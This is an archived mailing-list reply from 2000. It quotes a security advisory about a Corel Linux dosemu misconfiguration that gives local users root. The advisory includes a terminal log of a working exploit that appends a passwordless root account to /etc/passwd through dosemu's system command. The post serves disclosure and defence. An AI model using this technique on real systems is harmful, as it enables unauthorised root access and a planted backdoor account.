I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and did not get these results. It seems the debian maintainer (Herbert Xu) Did The Right Thing in the config file. :) * suidat_private <suidat_private> [000303 10:28]: > Re all, > > Hadn't seen this one around yet, has been on my site for about a week now. > > Corel's mailserver bounced me about this IIRC? Whats up Corel? > > Cheers. > > ---------------------------- > > suidat_private - Corel Linux dosemu config error. Local root compromise. > > Software: Corel Linux 1.0 dosemu distribution configuration > URL: http://linux.corel.com > Version: Version 1.0 > Platforms: Corel Linux only. > Type: Default misconfiguration. Noone reads README anymore?? > > Summary: > > Local users can take advantage of a packaging and configuration > error (which has been known and documented for a long time) to > execute arbitrary commands as root. > > We see from the doc/README/SECURITY file as well as > http://www.dosemu.org/docs/README/0.98/README-3.html > written in 1997 that this configuration is bad. > > Vulnerability: > > The system.com command is available to any user who runs the > dos emulator. This is a direct violation of the advice from > the SECURITY readme file: > > Never allow the 'system.com' command (part of dosemu) > to be executed. It makes dosemu > execute the libc 'system() function'. Though privileges > are turned off, the process inherits the > switched uid-setting (uid=root, euid=user), hence the > unix process can use setreuid to gain root > access back. ... the rest you can imagine your self. > > Exploit: > > This is a script log which details how to reproduce this: > > > Script started on Fri Feb 25 13:54:00 2000 > nebula:~$ id > uid=1000(suid) gid=1000(suid) groups=1000(suid) > nebula:~$ cat > hack-corel > #!/bin/bash > echo "owned::0:0::/:/bin/bash" >> /etc/passwd > ^D > nebula:~$ chmod a+rx hack-corel > nebula:~$ export PATH="$PATH:." > nebula:~$ dos > CPU speed set to 430/1 MHz > Running on CPU=586, FPU=1, rdtsc=1 > > [ snip bunch of dosemu crap ] > > "Welcome to dosemu 0.98! > C:\> system hack-corel; > sh: : command not found > C:\> exitERROR: general protection at 0x3f0ff: 0 > ERROR: SIGSEGV, protected insn...exiting! > > nebula:~$ tail -1 /etc/passwd > owned::0:0::/:/bin/bash > nebula:~$ su owned > nebula:/home/suid# id > uid=0(root) gid=0(root) groups=0(root) > nebula:/home/suid# exit > exit > nebula:~$ exit > > Script done on Fri Feb 25 13:55:27 2000 > > Note: > This is not a vulnerability in dosemu itself. The documentation > warns users very specifically that this will happen if the system > is configured as such. > > Greets: > > duke > cr > active > -- Seth Arnold | http://www.willamette.edu/~sarnold/ Hate spam? See http://maps.vix.com/rbl/ for help
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:58 PDT